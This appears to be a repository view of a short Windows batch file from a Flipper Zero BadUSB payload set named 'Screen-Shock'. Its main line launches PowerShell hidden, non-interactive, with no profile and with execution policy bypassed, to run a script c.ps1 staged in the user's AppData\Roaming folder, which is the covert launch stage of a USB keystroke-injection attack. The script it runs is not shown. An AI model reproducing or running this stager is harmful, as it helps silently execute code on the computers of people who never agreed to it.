Flipper/BadUSB/Screen-Shock/I.bat

4 lines
136 B
Batchfile
Raw Permalink Normal View History

2022-09-17 20:03:33 +00:00
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause